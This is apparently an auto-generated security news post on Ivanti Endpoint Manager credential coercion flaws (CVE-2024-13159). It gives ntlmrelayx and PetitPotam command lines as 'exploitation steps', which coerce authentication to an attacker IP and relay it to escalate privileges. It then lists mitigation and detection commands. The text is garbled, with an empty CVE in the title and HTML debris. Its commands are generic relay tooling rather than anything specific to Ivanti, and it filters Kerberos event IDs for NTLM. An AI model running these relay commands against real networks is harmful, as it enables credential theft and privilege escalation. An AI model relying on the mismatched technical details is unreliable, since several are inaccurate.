Ivanti Endpoint Manager – Multiple Credential Coercion Vulnerabilities (CVE–)

By /

Listen to this Post

Proof of concept exploits for Ivanti EPM CVE-2024-13159 and other vulnerabilities have been disclosed, allowing unauthenticated coercion of the Ivanti EPM machine credential for use in relay attacks.

POC: https://lnkd.in/diHhiVjK

You Should Know:

1. Understanding Credential Coercion & Relay Attacks

Credential coercion forces a system to authenticate against a malicious server, while relay attacks forward these authentication attempts to exploit privileges.

2. Vulnerable Ivanti EPM Components

  • EPM Cloud Services Appliance (CSA)
  • EPM Core Server
  • EPM Agent

3. Proof-of-Concept Exploitation Steps


<h1>Use Impacket's ntlmrelayx for coercion attack</h1>

ntlmrelayx.py -t ldap://<target_DC_IP> --escalate-user <compromised_machine$>

<h1>Force authentication via PetitPotam (Python alternative)</h1>

python3 petitpotam.py -d <domain> -u <user> -p <password> <attacker_IP> <target_IP>

#### **4. Mitigation & Detection**

  • Disable NTLM: Enforce Kerberos-only authentication. 
    </li>
</ul>

<h1>Group Policy (Windows)</h1>

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5

    Network Segmentation: Restrict EPM server communication.
    Patch Management: Apply Ivanti’s latest security updates.

    #### **5. Post-Exploitation Command Checks**

    
<h1>Check for unusual service tickets (Linux)</h1>

sudo klist -ket /etc/krb5.keytab

<h1>Monitor Windows event logs for NTLM relay</h1>

Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768,4769} | Where-Object {$_.Message -match "NTLM"}

    ### **What Undercode Say**

    The Ivanti EPM vulnerabilities highlight critical risks in credential handling, emphasizing the need for robust identity management. Organizations must:
    Enforce SMB Signing to prevent relay attacks: 

    Set-SmbServerConfiguration -RequireSecuritySignature $true

    Monitor LDAP/SMB Logs for anomalous authentication attempts.
    Use Linux-based detection tools like `tshark` for NTLM traffic: 

    sudo tshark -Y "ntlmssp" -i eth0 -V

    Deploy AD anomaly detection with tools like BloodHound.

    **Expected Output:**

    A hardened Ivanti EPM environment with disabled NTLM, enforced Kerberos, and continuous monitoring for coercion attempts.

    Note: Always test patches and mitigations in a non-production environment first.

    References:

    Reported By: Alvinbijo Ivanti – Hackers Feeds
    Extra Hub: Undercode MoN
    Basic Verification: Pass ✅

    Join Our Cyber World:

    💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: